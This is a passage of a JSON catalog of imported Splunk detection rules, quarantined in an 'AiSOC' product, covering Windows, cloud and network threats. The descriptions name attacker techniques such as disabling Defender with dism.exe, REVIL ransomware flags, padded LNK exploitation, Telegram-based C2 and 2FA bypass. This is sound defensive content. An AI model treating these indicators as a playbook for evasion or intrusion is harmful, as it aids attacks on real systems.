If confirmed malicious, these packages could allow attackers to execute arbitrary code with elevated privileges, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-appx-deployment-full-trust-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8560de46-ea2d-4c69-8ca3-5b78b90f1338", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_appx_deployment_full_trust_package_installation.yml" } }, { "id": "splunk-security-content-8567da9e-47f0-11ec-99a9-acde48001122", "type": "detection", "name": "Windows DISM Remove Defender", "description": "The following analytic detects the use of `dism.exe` to remove Windows Defender. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific parameters for disabling and removing Windows Defender. This activity is significant because adversaries may disable Defender to evade detection and carry out further malicious actions undetected. 
If confirmed malicious, this could lead to the attacker gaining persistent access, executing additional payloads, or exfiltrating sensitive data without being intercepted by Windows Defender.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dism-remove-defender.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8567da9e-47f0-11ec-99a9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dism_remove_defender.yml" } }, { "id": "splunk-security-content-85bc3f30-ca28-11eb-bd21-acde48001122", "type": "detection", "name": "PowerShell Loading DotNET into Memory via Reflection", "description": "The following analytic detects the use of PowerShell scripts to load .NET assemblies into memory via reflection, a technique often used in malicious activities such as those by Empire and Cobalt Strike. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command executed. This behavior is significant as it can indicate advanced attack techniques aiming to execute code in memory, bypassing traditional defenses. 
If confirmed malicious, this activity could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-loading-dotnet-into-memory-via-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85bc3f30-ca28-11eb-bd21-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_loading_dotnet_into_memory_via_reflection.yml" } }, { "id": "splunk-security-content-85c7555a-05af-4322-81aa-76b4ddf52baa", "type": "detection", "name": "O365 Email Suspicious Behavior Alert", "description": "The following analytic identifies when one of the built-in O365 security detections for suspicious email behaviors is triggered. These alerts often indicate that an attacker may have compromised a mailbox within the environment. Any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. 
Certain premium Office 365 capabilities further enhance these detection and response functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-suspicious-behavior-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85c7555a-05af-4322-81aa-76b4ddf52baa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_suspicious_behavior_alert.yml" } }, { "id": "splunk-security-content-85e88c80-e4ee-4c65-b02e-3c54d94c7a51", "type": "detection", "name": "Windows Wmic DiskDrive Discovery", "description": "The following analytic detects the use of Windows Management Instrumentation Command-line (WMIC) for disk drive discovery activities on a Windows system. This process involves monitoring commands such as \u201cwmic diskdrive\u201d which are often used by administrators for inventory and diagnostics but can also be leveraged by attackers to enumerate hardware details for malicious purposes. Detecting these commands is essential for identifying potentially unauthorized asset reconnaissance or pre-attack mapping behaviors. 
By capturing and analyzing WMIC disk drive queries, security teams can gain visibility into suspicious activities, enabling them to respond promptly and strengthen the organization\u2019s security posture against insider threats or lateral movement attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-diskdrive-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85e88c80-e4ee-4c65-b02e-3c54d94c7a51", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_diskdrive_discovery.yml" } }, { "id": "splunk-security-content-85facebe-c382-11eb-9c3e-acde48001122", "type": "detection", "name": "Revil Common Exec Parameter", "description": "The following analytic detects the execution of command-line parameters commonly associated with REVIL ransomware, such as \"-nolan\", \"-nolocal\", \"-fast\", and \"-full\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs mapped to the `Processes` node of the `Endpoint` data model. This activity is significant because these parameters are indicative of ransomware attempting to encrypt files on a compromised machine. 
If confirmed malicious, this could lead to widespread data encryption, rendering critical files inaccessible and potentially causing significant operational disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/revil-common-exec-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85facebe-c382-11eb-9c3e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/revil_common_exec_parameter.yml" } }, { "id": "splunk-security-content-85fae8fa-0427-11ec-8b78-acde48001122", "type": "detection", "name": "GetLocalUser with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-LocalUser` commandlet, which is used to query local user accounts. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is significant because adversaries and Red Teams may use it to enumerate local users for situational awareness and Active Directory discovery. 
If confirmed malicious, this activity could allow attackers to identify potential targets for further exploitation or privilege escalation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getlocaluser-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "85fae8fa-0427-11ec-8b78-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getlocaluser_with_powershell.yml" } }, { "id": "splunk-security-content-860902fd-2e76-46b3-b050-ba548dab576c", "type": "detection", "name": "Azure Automation Account Created", "description": "The following analytic detects the creation of a new Azure Automation account within an Azure tenant. It leverages Azure Audit events, specifically the Azure Activity log category, to identify when an account is created or updated. This activity is significant because Azure Automation accounts can be used to automate tasks and orchestrate actions across Azure and on-premise environments. 
If an attacker creates an Automation account with elevated privileges, they could maintain persistence, execute malicious runbooks, and potentially escalate privileges or execute code on virtual machines, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-automation-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "860902fd-2e76-46b3-b050-ba548dab576c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_automation_account_created.yml" } }, { "id": "splunk-security-content-8630aa22-042b-11ec-af39-acde48001122", "type": "detection", "name": "Gsuite Email With Known Abuse Web Service Link", "description": "The following analytic detects emails in Gsuite containing links to known abuse web services such as Pastebin, Telegram, and Discord. It leverages Gsuite Gmail logs to identify emails with these specific domains in their links. This activity is significant because these services are commonly used by attackers to deliver malicious payloads. 
If confirmed malicious, this could lead to the delivery of malware, phishing attacks, or other harmful activities, potentially compromising sensitive information or systems within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-email-with-known-abuse-web-service-link.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8630aa22-042b-11ec-af39-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_email_with_known_abuse_web_service_link.yml" } }, { "id": "splunk-security-content-868ee0e4-52ab-484a-833a-6d85b7c028d0", "type": "detection", "name": "GetDomainController with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-DomainController` command, which is used to discover remote systems within a Windows domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is crucial as it may indicate an attempt to enumerate domain controllers, a common tactic in Active Directory discovery. 
If confirmed malicious, this activity could allow attackers to gain situational awareness, potentially leading to further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincontroller-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "868ee0e4-52ab-484a-833a-6d85b7c028d0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincontroller_with_powershell.yml" } }, { "id": "splunk-security-content-868f3131-d5e1-4bf1-af5b-9b0fbaaaedbb", "type": "detection", "name": "O365 Privileged Graph API Permission Assigned", "description": "The following analytic detects the assignment of critical Graph API permissions in Azure AD using the O365 Unified Audit Log. It focuses on permissions such as Application.ReadWrite.All, AppRoleAssignment.ReadWrite.All, and RoleManagement.ReadWrite.Directory. The detection method leverages Azure Active Directory workload events, specifically 'Update application' operations. This activity is significant as these permissions provide extensive control over Azure AD settings, posing a high risk if misused. If confirmed malicious, this could allow unauthorized modifications, leading to potential data breaches or privilege escalation. 
Immediate investigation is crucial.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-privileged-graph-api-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "868f3131-d5e1-4bf1-af5b-9b0fbaaaedbb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_privileged_graph_api_permission_assigned.yml" } }, { "id": "splunk-security-content-869ba261-c272-47d7-affe-5c0aa85c93d6", "type": "detection", "name": "Headless Browser Usage", "description": "The following analytic detects the usage of headless browsers within an organization. It identifies processes containing the \"--headless\" and \"--disable-gpu\" command line arguments, which are indicative of headless browsing. This detection leverages data from the Endpoint.Processes datamodel to identify such processes. Monitoring headless browser usage is significant as these tools can be exploited by adversaries for malicious activities like web scraping, automated testing, and undetected web interactions. 
If confirmed malicious, this activity could lead to unauthorized data extraction, automated attacks, or other covert operations on web applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/headless-browser-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "869ba261-c272-47d7-affe-5c0aa85c93d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/headless_browser_usage.yml" } }, { "id": "splunk-security-content-86a5b949-679b-4197-8d4c-9c180a818c45", "type": "detection", "name": "Windows Network Connection Discovery Via Net", "description": "The following analytic identifies the execution of `net.exe` with command-line arguments used to list or display information about computer connections. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential network reconnaissance by adversaries or Red Teams, aiming to gather situational awareness and Active Directory information. 
If confirmed malicious, this behavior could allow attackers to map the network, identify critical assets, and plan further attacks, potentially leading to data exfiltration or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-network-connection-discovery-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "86a5b949-679b-4197-8d4c-9c180a818c45", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_network_connection_discovery_via_net.yml" } }, { "id": "splunk-security-content-86dc8176-6e6c-42d6-9684-5444c6557ab3", "type": "detection", "name": "Windows PowerView Constrained Delegation Discovery", "description": "The following analytic detects the use of PowerView commandlets to discover Windows endpoints with Kerberos Constrained Delegation. It leverages PowerShell Script Block Logging (EventCode=4104) to identify specific commandlets like `Get-DomainComputer` or `Get-NetComputer` with the `-TrustedToAuth` parameter. This activity is significant as it indicates potential reconnaissance efforts by adversaries or Red Teams to map out privileged delegation settings in Active Directory. 
If confirmed malicious, this could allow attackers to identify high-value targets for further exploitation, potentially leading to privilege escalation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-constrained-delegation-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "86dc8176-6e6c-42d6-9684-5444c6557ab3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_constrained_delegation_discovery.yml" } }, { "id": "splunk-security-content-86f66f44-94d9-412d-a71d-5d8ed0fef72e", "type": "detection", "name": "Windows DNS Query Request by Telegram Bot API", "description": "The following analytic detects the execution of a DNS query by a process to the associated Telegram API domain, which could indicate access via a Telegram bot commonly used by malware for command and control (C2) communications. By monitoring DNS queries related to Telegram's infrastructure, the detection identifies potential attempts to establish covert communication channels between a compromised system and external malicious actors. 
This behavior is often observed in cyberattacks where Telegram bots are used to receive commands or exfiltrate data, making it a key indicator of suspicious or malicious activity within a network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1102.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dns-query-request-by-telegram-bot-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "86f66f44-94d9-412d-a71d-5d8ed0fef72e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_dns_query_request_by_telegram_bot_api.yml" } }, { "id": "splunk-security-content-8728d224-9cd5-4aa7-b75f-f8520a569979", "type": "detection", "name": "Cisco Duo Set User Status to Bypass 2FA", "description": "The following analytic detects instances where a Duo user's status is changed to \"Bypass\" for 2FA, specifically when the\nprevious status was \"Active.\" This behavior is identified by analyzing Duo activity logs for user update actions, extracting\nthe status transitions, and filtering for cases where a user is set to bypass multi-factor authentication. This is a critical\nevent for a Security Operations Center (SOC) to monitor, as bypassing 2FA significantly weakens account security and may\nindicate malicious insider activity or account compromise. Attackers or unauthorized administrators may exploit this change to\ndisable strong authentication controls, increasing the risk of unauthorized access to sensitive systems and data. 
Early detection\nof such changes enables rapid investigation and response, helping to prevent potential breaches and limit the impact of\ncredential-based attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-set-user-status-to-bypass-2fa.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8728d224-9cd5-4aa7-b75f-f8520a569979", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_set_user_status_to_bypass_2fa.yml" } }, { "id": "splunk-security-content-872e3063-0fc4-4e68-b2f3-f2b99184a708", "type": "detection", "name": "GetAdGroup with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with the `Get-AdGroup` commandlet, which is used to query domain groups in a Windows Domain. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is crucial as it may indicate an adversary or Red Team enumerating domain groups for situational awareness and Active Directory discovery. 
If confirmed malicious, this activity could lead to further reconnaissance, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadgroup-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "872e3063-0fc4-4e68-b2f3-f2b99184a708", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadgroup_with_powershell.yml" } }, { "id": "splunk-security-content-875de3d7-09bc-4916-8c0a-0929f4ced3d8", "type": "detection", "name": "Azure AD Block User Consent For Risky Apps Disabled", "description": "The following analytic detects when the risk-based step-up consent security setting in Azure AD is disabled. It monitors Azure Active Directory logs for the \"Update authorization policy\" operation, specifically changes to the \"AllowUserConsentForRiskyApps\" setting. This activity is significant because disabling this feature can expose the organization to OAuth phishing threats by allowing users to grant consent to potentially malicious applications. 
If confirmed malicious, attackers could gain unauthorized access to user data and sensitive information, leading to data breaches and further compromise within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-block-user-consent-for-risky-apps-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "875de3d7-09bc-4916-8c0a-0929f4ced3d8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_block_user_consent_for_risky_apps_disabled.yml" } }, { "id": "splunk-security-content-8775fcf3-05e4-4525-bba2-a56e39d8d050", "type": "detection", "name": "Windows Explorer LNK Exploit Process Launch With Padding", "description": "This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes with abnormally large padding (50 or more spaces) in the command line. This specific pattern is a key indicator of the ZDI-CAN-25373 Windows shortcut zero-day vulnerability exploitation, where threat actors craft malicious LNK files containing padded content to trigger code execution. The excessive spacing in the command line is used to manipulate the way Windows processes the shortcut file, enabling arbitrary code execution. This technique has been actively exploited by multiple APT groups in targeted attacks, with malicious LNK files being delivered through both HTTP and SMB protocols. 
The presence of significant command line padding when Explorer.exe launches command shells is highly suspicious and warrants immediate investigation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-explorer-lnk-exploit-process-launch-with-padding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8775fcf3-05e4-4525-bba2-a56e39d8d050", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_explorer_lnk_exploit_process_launch_with_padding.yml" } }, { "id": "splunk-security-content-879c4330-b3e0-11eb-b1b1-acde48001122", "type": "detection", "name": "SLUI Spawning a Process", "description": "The following analytic detects the Microsoft Software Licensing User Interface Tool (`slui.exe`) spawning a child process. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where `slui.exe` is the parent process. This activity is significant because `slui.exe` should not typically spawn child processes, and doing so may indicate a UAC bypass attempt, leading to elevated privileges. 
If confirmed malicious, an attacker could leverage this to execute code with elevated privileges, potentially compromising the system's security and gaining unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/slui-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "879c4330-b3e0-11eb-b1b1-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/slui_spawning_a_process.yml" } }, { "id": "splunk-security-content-87ac670e-bbfd-44ca-b566-44e9f835518d", "type": "detection", "name": "Steal or Forge Authentication Certificates Behavior Identified", "description": "The following analytic identifies potential threats related to the theft or forgery of authentication certificates. It detects when five or more analytics from the Windows Certificate Services story trigger within a specified timeframe. This detection leverages aggregated risk scores and event counts from the Risk data model. This activity is significant as it may indicate an ongoing attack aimed at compromising authentication mechanisms. 
If confirmed malicious, attackers could gain unauthorized access to sensitive systems and data, potentially leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/steal-or-forge-authentication-certificates-behavior-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "87ac670e-bbfd-44ca-b566-44e9f835518d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/steal_or_forge_authentication_certificates_behavior_identified.yml" } }, { "id": "splunk-security-content-88103f56-8f5c-411f-a87f-71bee776f140", "type": "detection", "name": "Windows Chromium Browser Launched with Small Window Size", "description": "The following analytic detects instances where a Chromium-based browser process, including Chrome, Edge, Brave, Opera, or Vivaldi, is launched with an unusually small window size, typically less than 100 pixels in width or height. Such configurations render the browser effectively invisible to the user and are uncommon in normal user activity. When observed on endpoints, especially in combination with automation, off-screen positioning, or suppression flags, this behavior may indicate attempts to execute web content or automated actions stealthily, bypassing user interaction and security controls. 
This analytic highlights potential malicious automation or covert browser-based activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-browser-launched-with-small-window-size.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "88103f56-8f5c-411f-a87f-71bee776f140", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_browser_launched_with_small_window_size.yml" } }, { "id": "splunk-security-content-884a5f59-eec7-4f4a-948b-dbde18225fdc", "type": "detection", "name": "AWS Detect Users with KMS keys performing encryption S3", "description": "The following analytic identifies users with KMS keys performing encryption operations on S3 buckets. It leverages AWS CloudTrail logs to detect the `CopyObject` event where server-side encryption with AWS KMS is specified. This activity is significant as it may indicate unauthorized or suspicious encryption of data, potentially masking exfiltration or tampering efforts. 
If confirmed malicious, an attacker could be encrypting sensitive data to evade detection or preparing it for exfiltration, posing a significant risk to data integrity and confidentiality.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-detect-users-with-kms-keys-performing-encryption-s3.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "884a5f59-eec7-4f4a-948b-dbde18225fdc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_detect_users_with_kms_keys_performing_encryption_s3.yml" } }, { "id": "splunk-security-content-885ea672-07ee-475a-879e-60d28aa5dd42", "type": "detection", "name": "Detect Remote Access Software Usage Traffic", "description": "The following analytic detects network traffic associated with known remote access software applications, such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer.\nIt leverages Palo Alto traffic logs mapped to the Network_Traffic data model in Splunk. 
